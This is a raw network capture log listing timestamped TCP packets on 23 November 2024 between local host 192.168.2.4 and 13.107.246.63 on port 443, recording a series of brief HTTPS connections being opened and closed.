                                                                                                                                                                                  Nov 23, 2024 14:47:15.893603086 CET4434983713.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:15.894257069 CET49837443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:15.894279957 CET4434983713.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:15.894721031 CET49837443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:15.894727945 CET4434983713.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:16.046098948 CET4434983413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:16.046176910 CET4434983413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:16.046222925 CET49834443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:16.046416998 CET49834443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:16.046437979 CET4434983413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:16.046447992 CET49834443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:16.046454906 CET4434983413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:16.049170017 CET49838443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:16.049202919 CET4434983813.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:16.049284935 CET49838443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:16.049422026 CET49838443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:16.049433947 CET4434983813.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:16.069869995 CET4434983313.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:16.069962025 CET4434983313.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:16.070015907 CET49833443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:16.070164919 CET49833443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:16.070180893 CET4434983313.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:16.070195913 CET49833443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:16.070202112 CET4434983313.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:16.073277950 CET49839443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:16.073348999 CET4434983913.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:16.073432922 CET49839443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:16.073569059 CET49839443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:16.073605061 CET4434983913.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:16.155905008 CET4434983613.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:16.155971050 CET4434983613.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:16.156095028 CET49836443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:16.156295061 CET49836443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:16.156313896 CET4434983613.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:16.156326056 CET49836443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:16.156332970 CET4434983613.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:16.159228086 CET49840443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:16.159248114 CET4434984013.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:16.159331083 CET49840443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:16.159467936 CET49840443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:16.159482956 CET4434984013.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:16.187170029 CET4434983513.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:16.187254906 CET4434983513.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:16.187330008 CET49835443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:16.187473059 CET49835443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:16.187479973 CET4434983513.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:16.187493086 CET49835443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:16.187496901 CET4434983513.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:16.189994097 CET49841443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:16.190021992 CET4434984113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:16.191236973 CET49841443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:16.191356897 CET49841443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:16.191368103 CET4434984113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:16.358850956 CET4434983713.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:16.358984947 CET4434983713.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:16.359093904 CET49837443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:16.360296965 CET49837443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:16.360296965 CET49837443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:16.360321999 CET4434983713.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:16.360344887 CET4434983713.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:16.363239050 CET49842443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:16.363259077 CET4434984213.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:16.363339901 CET49842443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:16.363482952 CET49842443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:16.363495111 CET4434984213.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:17.854588032 CET4434983913.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:17.906411886 CET49839443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:17.969667912 CET4434984113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:17.995745897 CET49839443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:17.995759964 CET4434983913.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:17.996330976 CET49839443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:17.996337891 CET4434983913.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:17.997867107 CET49841443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:17.997883081 CET4434984113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:17.998287916 CET49841443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:17.998292923 CET4434984113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:18.001908064 CET4434984013.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:18.002602100 CET49840443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:18.002629995 CET4434984013.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:18.003062010 CET49840443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:18.003067970 CET4434984013.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:18.009092093 CET4434983813.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:18.010812998 CET49838443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:18.010833025 CET4434983813.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:18.011600971 CET49838443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:18.011605024 CET4434983813.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:18.213597059 CET4434984213.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:18.214101076 CET49842443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:18.214119911 CET4434984213.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:18.214597940 CET49842443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:18.214603901 CET4434984213.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:18.323651075 CET4434983913.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:18.323817015 CET4434983913.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:18.323883057 CET49839443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:18.324044943 CET49839443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:18.324044943 CET49839443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:18.324099064 CET4434983913.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:18.324125051 CET4434983913.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:18.327349901 CET49843443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:18.327393055 CET4434984313.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:18.327466965 CET49843443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:18.327744007 CET49843443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:18.327756882 CET4434984313.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:18.414386988 CET4434984113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:18.414468050 CET4434984113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:18.414518118 CET49841443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:18.414700985 CET49841443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:18.414721012 CET4434984113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:18.414731979 CET49841443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:18.414737940 CET4434984113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:18.419244051 CET49844443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:18.419271946 CET4434984413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:18.419358015 CET49844443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:18.419519901 CET49844443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:18.419539928 CET4434984413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:18.454417944 CET4434984013.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:18.454485893 CET4434984013.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:18.454530954 CET49840443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:18.454731941 CET49840443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:18.454745054 CET4434984013.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:18.454754114 CET49840443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:18.454758883 CET4434984013.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:18.457994938 CET49845443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:18.458028078 CET4434984513.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:18.458101034 CET49845443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:18.458285093 CET49845443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:18.458296061 CET4434984513.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:18.461875916 CET4434983813.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:18.461950064 CET4434983813.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:18.462013960 CET49838443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:18.462188959 CET49838443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:18.462204933 CET4434983813.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:18.488574028 CET49846443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:18.488615990 CET4434984613.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:18.488717079 CET49846443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:18.491764069 CET49846443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:18.491794109 CET4434984613.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:18.680705070 CET4434984213.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:18.680860996 CET4434984213.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:18.680941105 CET49842443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:18.681185961 CET49842443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:18.681194067 CET4434984213.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:18.681214094 CET49842443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:18.681217909 CET4434984213.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:18.684564114 CET49847443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:18.684593916 CET4434984713.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:18.684691906 CET49847443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:18.684879065 CET49847443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:18.684891939 CET4434984713.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:20.227171898 CET4434984313.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:20.227776051 CET49843443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:20.227792025 CET4434984313.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:20.229784966 CET49843443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:20.229793072 CET4434984313.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:20.269813061 CET4434984513.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:20.270572901 CET49845443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:20.270587921 CET4434984513.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:20.271564007 CET49845443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:20.271569967 CET4434984513.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:20.292527914 CET4434984413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:20.313159943 CET49844443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:20.313218117 CET4434984413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:20.314002991 CET49844443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:20.314018011 CET4434984413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:20.388288975 CET4434984613.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:20.389156103 CET49846443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:20.389179945 CET4434984613.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:20.389790058 CET49846443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:20.389802933 CET4434984613.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:20.497118950 CET4434984713.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:20.502003908 CET49847443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:20.502027035 CET4434984713.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:20.509443998 CET49847443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:20.509450912 CET4434984713.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:20.680408955 CET4434984313.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:20.680479050 CET4434984313.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:20.680532932 CET49843443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:20.681653023 CET49843443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:20.681674957 CET4434984313.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:20.681687117 CET49843443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:20.681694031 CET4434984313.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:20.687370062 CET49848443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:20.687427044 CET4434984813.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:20.687504053 CET49848443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:20.688105106 CET49848443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:20.688153028 CET4434984813.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:20.713485956 CET4434984513.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:20.713563919 CET4434984513.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:20.713618040 CET49845443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:20.714016914 CET49845443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:20.714016914 CET49845443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:20.714052916 CET4434984513.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:20.714062929 CET4434984513.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:20.719266891 CET49849443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:20.719291925 CET4434984913.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:20.719439030 CET49849443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:20.719750881 CET49849443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:20.719763994 CET4434984913.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:20.750957012 CET4434984413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:20.751014948 CET4434984413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:20.751064062 CET49844443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:20.751483917 CET49844443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:20.751483917 CET49844443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:20.751523018 CET4434984413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:20.751548052 CET4434984413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:20.756170034 CET49850443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:20.756208897 CET4434985013.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:20.756278992 CET49850443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:20.756611109 CET49850443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:20.756628990 CET4434985013.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:20.842636108 CET4434984613.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:20.842691898 CET4434984613.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:20.842740059 CET49846443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:20.842937946 CET49846443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:20.842938900 CET49846443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:20.842958927 CET4434984613.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:20.842982054 CET4434984613.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:20.845705032 CET49851443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:20.845720053 CET4434985113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:20.845968008 CET49851443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:20.845968008 CET49851443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:20.845988989 CET4434985113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:20.939744949 CET4434984713.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:20.939887047 CET4434984713.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:20.940010071 CET49847443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:20.940212965 CET49847443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:20.940239906 CET4434984713.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:20.940252066 CET49847443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:20.940258980 CET4434984713.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:20.943044901 CET49852443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:20.943089962 CET4434985213.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:20.943172932 CET49852443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:20.943336964 CET49852443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:20.943365097 CET4434985213.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:22.440912962 CET4434984913.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:22.441684961 CET49849443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:22.441695929 CET4434984913.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:22.442207098 CET49849443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:22.442212105 CET4434984913.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:22.535021067 CET4434985013.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:22.535473108 CET49850443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:22.535510063 CET4434985013.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:22.535931110 CET49850443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:22.535948992 CET4434985013.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:22.540644884 CET4434984813.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:22.541001081 CET49848443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:22.541022062 CET4434984813.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:22.541563034 CET49848443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:22.541574955 CET4434984813.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:22.644294977 CET4434985113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:22.644862890 CET49851443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:22.644871950 CET4434985113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:22.645442009 CET49851443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:22.645446062 CET4434985113.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:22.723685026 CET4434985213.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:22.724225044 CET49852443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:22.724248886 CET4434985213.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:22.724716902 CET49852443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:22.724729061 CET4434985213.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:22.877427101 CET4434984913.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:22.877505064 CET4434984913.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:22.877563000 CET49849443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:22.877767086 CET49849443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:22.877774954 CET4434984913.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:22.877784967 CET49849443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:22.877789021 CET4434984913.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:22.881040096 CET49853443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:22.881093979 CET4434985313.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:22.881180048 CET49853443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:22.881352901 CET49853443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:22.881370068 CET4434985313.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:22.978334904 CET4434985013.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:22.978418112 CET4434985013.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:22.978476048 CET49850443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:22.978915930 CET49850443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:22.978950977 CET4434985013.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:22.978977919 CET49850443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:22.978992939 CET4434985013.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:22.981380939 CET49854443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:22.981457949 CET4434985413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:22.981559992 CET49854443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:22.981683016 CET49854443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:22.981719971 CET4434985413.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:22.994060040 CET4434984813.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:22.994132996 CET4434984813.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:22.994237900 CET49848443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:22.994390965 CET49848443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:22.994390965 CET49848443192.168.2.413.107.246.63
                                                                                                                                                                                  Nov 23, 2024 14:47:22.994426966 CET4434984813.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:22.994450092 CET4434984813.107.246.63192.168.2.4
                                                                                                                                                                                  Nov 23, 2024 14:47:22.997386932 CET49855443192.168.2.413.107.246.63
